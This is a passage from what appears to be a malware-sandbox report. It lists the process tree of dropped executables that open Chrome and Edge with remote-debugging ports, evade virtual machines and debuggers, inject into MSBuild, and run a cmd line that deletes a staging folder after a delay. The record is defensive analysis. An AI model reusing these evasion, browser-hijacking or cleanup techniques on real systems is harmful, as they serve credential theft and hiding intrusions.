        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fffb100dcf8,0x7fffb100dd04,0x7fffb100dd10
        6⤵
        
        PID:1028
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2052,i,4233142642630253882,11680080667480506615,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2032 /prefetch:2
        6⤵
        
        PID:436
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1600,i,4233142642630253882,11680080667480506615,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2272 /prefetch:3
        6⤵
        
        PID:1896
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2384,i,4233142642630253882,11680080667480506615,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2532 /prefetch:8
        6⤵
        
        PID:4660
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3248,i,4233142642630253882,11680080667480506615,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3260 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:3784
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3268,i,4233142642630253882,11680080667480506615,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3312 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:3652
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4300,i,4233142642630253882,11680080667480506615,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4324 /prefetch:2
        6⤵
        Uses browser remote debugging
        
        PID:5404
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4724,i,4233142642630253882,11680080667480506615,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4668 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:3840
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5348,i,4233142642630253882,11680080667480506615,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5356 /prefetch:8
        6⤵
        
        PID:5420
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5352,i,4233142642630253882,11680080667480506615,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4460 /prefetch:8
        6⤵
        
        PID:776
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5556,i,4233142642630253882,11680080667480506615,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5636 /prefetch:8
        6⤵
        
        PID:4796
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5708,i,4233142642630253882,11680080667480506615,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5720 /prefetch:8
        6⤵
        
        PID:1416
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5624,i,4233142642630253882,11680080667480506615,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5580 /prefetch:8
        6⤵
        
        PID:1944
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5616,i,4233142642630253882,11680080667480506615,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5724 /prefetch:8
        6⤵
        
        PID:3940
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        5⤵
        Uses browser remote debugging
        Checks processor information in registry
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        Modifies registry class
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        
        PID:6088
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x258,0x7fffb037f208,0x7fffb037f214,0x7fffb037f220
        6⤵
        
        PID:4916
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2180,i,4672032645935619218,17071563965938339821,262144 --variations-seed-version --mojo-platform-channel-handle=2176 /prefetch:2
        6⤵
        
        PID:1632
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1904,i,4672032645935619218,17071563965938339821,262144 --variations-seed-version --mojo-platform-channel-handle=2232 /prefetch:3
        6⤵
        
        PID:4612
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2436,i,4672032645935619218,17071563965938339821,262144 --variations-seed-version --mojo-platform-channel-handle=2712 /prefetch:8
        6⤵
        
        PID:3824
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3548,i,4672032645935619218,17071563965938339821,262144 --variations-seed-version --mojo-platform-channel-handle=3628 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:4176
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3580,i,4672032645935619218,17071563965938339821,262144 --variations-seed-version --mojo-platform-channel-handle=3632 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:6024
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4212,i,4672032645935619218,17071563965938339821,262144 --variations-seed-version --mojo-platform-channel-handle=4244 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:4180
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4232,i,4672032645935619218,17071563965938339821,262144 --variations-seed-version --mojo-platform-channel-handle=4248 /prefetch:2
        6⤵
        Uses browser remote debugging
        
        PID:4900
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5132,i,4672032645935619218,17071563965938339821,262144 --variations-seed-version --mojo-platform-channel-handle=5208 /prefetch:8
        6⤵
        
        PID:448
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3764,i,4672032645935619218,17071563965938339821,262144 --variations-seed-version --mojo-platform-channel-handle=3744 /prefetch:8
        6⤵
        
        PID:3780
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4816,i,4672032645935619218,17071563965938339821,262144 --variations-seed-version --mojo-platform-channel-handle=5316 /prefetch:8
        6⤵
        
        PID:5532
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3796,i,4672032645935619218,17071563965938339821,262144 --variations-seed-version --mojo-platform-channel-handle=5340 /prefetch:8
        6⤵
        
        PID:2936
      - C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6312,i,4672032645935619218,17071563965938339821,262144 --variations-seed-version --mojo-platform-channel-handle=6528 /prefetch:8
        6⤵
        
        PID:5152
      - C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6312,i,4672032645935619218,17071563965938339821,262144 --variations-seed-version --mojo-platform-channel-handle=6528 /prefetch:8
        6⤵
        
        PID:3808
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6660,i,4672032645935619218,17071563965938339821,262144 --variations-seed-version --mojo-platform-channel-handle=6640 /prefetch:8
        6⤵
        
        PID:3516
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6680,i,4672032645935619218,17071563965938339821,262144 --variations-seed-version --mojo-platform-channel-handle=6824 /prefetch:8
        6⤵
        
        PID:4284
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\gdjmg" & exit
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4552
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 11
        6⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:6588
- - C:\Users\Admin\AppData\Local\Temp\10361680101\jokererer.exe
    "C:\Users\Admin\AppData\Local\Temp\10361680101\jokererer.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:2428
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:4580
- - C:\Users\Admin\AppData\Local\Temp\10361700101\b842abf8f3.exe
    "C:\Users\Admin\AppData\Local\Temp\10361700101\b842abf8f3.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:5488
- - C:\Users\Admin\AppData\Local\Temp\10361710101\ec9a0b61cd.exe
    "C:\Users\Admin\AppData\Local\Temp\10361710101\ec9a0b61cd.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:4536
- - C:\Users\Admin\AppData\Local\Temp\10361720101\74957b3341.exe
    "C:\Users\Admin\AppData\Local\Temp\10361720101\74957b3341.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Downloads MZ/PE file
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Loads dropped DLL
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:1192
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
      4⤵
      Uses browser remote debugging
      Checks processor information in registry
      Enumerates system info in registry
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      PID:5020
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fffb100dcf8,0x7fffb100dd04,0x7fffb100dd10
        5⤵
        
        PID:5984
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --subproc-heap-profiling --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1996,i,10844936200787185113,10083002532664937967,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1992 /prefetch:2
        5⤵
        
        PID:4620
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --subproc-heap-profiling --field-trial-handle=1600,i,10844936200787185113,10083002532664937967,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1940 /prefetch:3
        5⤵
        
        PID:1480
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --subproc-heap-profiling --field-trial-handle=2392,i,10844936200787185113,10083002532664937967,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2344 /prefetch:8
        5⤵
        
        PID:672
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --subproc-heap-profiling --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3240,i,10844936200787185113,10083002532664937967,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3324 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:1636
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --subproc-heap-profiling --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3248,i,10844936200787185113,10083002532664937967,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3344 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:2376
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4248,i,10844936200787185113,10083002532664937967,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4292 /prefetch:2
        5⤵
        Uses browser remote debugging
        
        PID:2004
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --subproc-heap-profiling --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4672,i,10844936200787185113,10083002532664937967,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4700 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:5472
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --subproc-heap-profiling --field-trial-handle=4864,i,10844936200787185113,10083002532664937967,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5264 /prefetch:8
        5⤵
        
        PID:3312
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --subproc-heap-profiling --field-trial-handle=5468,i,10844936200787185113,10083002532664937967,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5480 /prefetch:8
        5⤵
        
        PID:1060
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --subproc-heap-profiling --field-trial-handle=5548,i,10844936200787185113,10083002532664937967,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5300 /prefetch:8
        5⤵
        
        PID:2652
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --subproc-heap-profiling --field-trial-handle=5260,i,10844936200787185113,10083002532664937967,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5372 /prefetch:8
        5⤵
        
        PID:5224
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --subproc-heap-profiling --field-trial-handle=5704,i,10844936200787185113,10083002532664937967,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5420 /prefetch:8
        5⤵
        
        PID:2136
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --subproc-heap-profiling --field-trial-handle=5340,i,10844936200787185113,10083002532664937967,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5288 /prefetch:8
        5⤵
        
        PID:4108
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
      4⤵
      Uses browser remote debugging
      Checks processor information in registry
      Enumerates system info in registry
      Modifies data under HKEY_USERS
      Modifies registry class
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      PID:3612
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x240,0x244,0x248,0x23c,0x210,0x7fffaccef208,0x7fffaccef214,0x7fffaccef220
        5⤵
        
        PID:1084
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1904,i,11679648629767031024,4644432939629990109,262144 --variations-seed-version --mojo-platform-channel-handle=2196 /prefetch:3
        5⤵
        
        PID:4608
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2168,i,11679648629767031024,4644432939629990109,262144 --variations-seed-version --mojo-platform-channel-handle=2164 /prefetch:2
        5⤵
        
        PID:3720
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2496,i,11679648629767031024,4644432939629990109,262144 --variations-seed-version --mojo-platform-channel-handle=2756 /prefetch:8
        5⤵
        
        PID:1188
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3544,i,11679648629767031024,4644432939629990109,262144 --variations-seed-version --mojo-platform-channel-handle=3632 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:2952
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3552,i,11679648629767031024,4644432939629990109,262144 --variations-seed-version --mojo-platform-channel-handle=3376 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:4064
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
